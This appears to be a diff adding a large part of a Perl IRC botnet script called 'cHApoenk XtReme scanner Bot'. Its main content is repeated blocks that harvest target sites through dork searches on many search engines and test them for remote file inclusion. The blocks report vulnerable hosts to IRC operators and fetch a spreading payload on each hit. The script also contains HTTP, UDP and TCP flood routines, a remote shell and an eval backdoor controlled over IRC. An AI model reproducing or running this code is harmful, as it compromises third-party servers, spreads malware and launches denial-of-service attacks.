+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl  :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### LYCOS
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @lylist=&lycos($dork);
+push(my @lybyp,@lylist);
+#
+push(my @tot, @lybyp);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### Yahoo
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ylist=&yahoo($dork);
+	my @yalist=&yahooa($dork);
+	my @yblist=&yahoob($dork);
+	my @yclist=&yahooc($dork);
+	my @ydlist=&yahood($dork);
+		push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist );	
+#
+push(my @tot, @yahoobypass);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MSN
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mlist=&msn($dork);
+push(my @tot, @mlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### SEARCH
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @slist=&search($dork);
+push(my @tot, @slist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### FireBall
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @fireball=fireball($dork);
+push(my @tot, @fireball);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### UOL
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ulist=&uol($dork);
+push(my @tot, @ulist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### ALTAVISTA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alist=&altavista($dork);
+	my @ablist=&altavistade($dork);
+	my @aclist=&altavistaus($dork);
+push(my @tot, @alist,@ablist,@aclist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### HOTBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @hlist=&hotbot($dork);
+push(my @tot, @hlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MAMMA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @malist=&mamma($dork);
+push(my @tot, @malist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MOZBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mozlist=&mozbot($dork);
+push(my @tot, @mozlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################
+#End of EXTREMEscanNER# 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#     HTTPFlood      # 
+#                    #
+######################
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking 4 ".$1." on port 80 for 4 ".$2." seconds .");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking done 4 ".$1.".");
+}
+######################
+#  End of HTTPFlood  # 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#     UDPFlood       # 
+#                    #
+######################
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking4 ".$1." with 4 ".$2." Kb Packets for 4 ".$3." seconds.");
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+$dtime = 1 if $dtime == 0;
+my %bytes;
+$bytes{igmp} = $2 * $pacotes{igmp};
+$bytes{icmp} = $2 * $pacotes{icmp};
+$bytes{o} = $2 * $pacotes{o};
+$bytes{udp} = $2 * $pacotes{udp};
+$bytes{tcp} = $2 * $pacotes{tcp};
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in4 ".$dtime." seconds to4 ".$1.".");
+}
+exit;
+}
+}
+######################
+#  End of Udpflood   # 
+#                    #
+######################
+
+
+sub ircase {
+my ($kem, $printl, $case) = @_;
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+if ($case =~ /^rejoin\s+(.*)/) {
+my $chan = $1;
+if ($chan =~ /^(\d+) (.*)/) {
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+p("$2");
+j("$2");
+}
+}
+else {
+p("$chan");
+j("$chan");
+}
+}
+
+if ($case =~ /^op/) {
+op("$printl", "$kem") if $case eq "op";
+my $oarg = substr($case, 3);
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^deop/) {
+deop("$printl", "$kem") if $case eq "deop";
+my $oarg = substr($case, 5);
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+msg("$1", "$2");
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+msg("$2", "$3");
+}
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+ctcp("$1", "$2");
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+ctcp("$2", "$3");
+}
+}
+
+if ($case =~ /^nick (.*)/) {
+nick("$1");
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+conectar("$2", "$1", 6667);
+}
+
+if ($case =~ /^raw (.*)/) {
+sendraw("$1");
+}
+
+if ($case =~ /^eval (.*)/) {
+eval "$1";
+}
+}
+
+
+sub shell {
+my $printl=$_[0];
+my $comando=$_[1];
+if ($comando =~ /cd (.*)/) {
+chdir("$1") || msg("$printl", "No such file or directory");
+return;
+}
+
+elsif ($pid = fork) {
+waitpid($pid, 0);
+}
+else {
+if (fork) {
+exit;
+
+} else {
+my @resp=`$comando 2>&1 3>&1`;
+my $c=0;
+foreach my $linha (@resp) {
+  $c++;
+  chop $linha;
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+  if ($c == "$linas_max") {
+    $c=0;
+    sleep $sleep;
+  }
+}
+exit;
+}
+}
+}
+
+sub tcpflooder {
+my $itime = time;
+my ($cur_time);
+my ($ia,$pa,$proto,$j,$l,$t);
+$ia=inet_aton($_[0]);
+$pa=sockaddr_in($_[1],$ia);
+$ftime=$_[2];
+$proto=getprotobyname('tcp');
+$j=0;$l=0;
+$cur_time = time - $itime;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+socket($t,PF_INET,SOCK_STREAM,$proto);
+connect($t,$pa)||$j--;
+$j++;$l++;
+}
+$l=0;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+shutdown($t,2);
+$l++;
+}
+}
+
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+
+sub udpflooder {
+my $iaddr = inet_aton($_[0]);
+my $msg = 'A' x $_[1];
+my $ftime = $_[2];
+my $cp = 0;
+my (%pacotes);
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+return(undef) if $cp == 4;
+my $itime = time;
+my ($cur_time);
+while ( 1 ) {
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
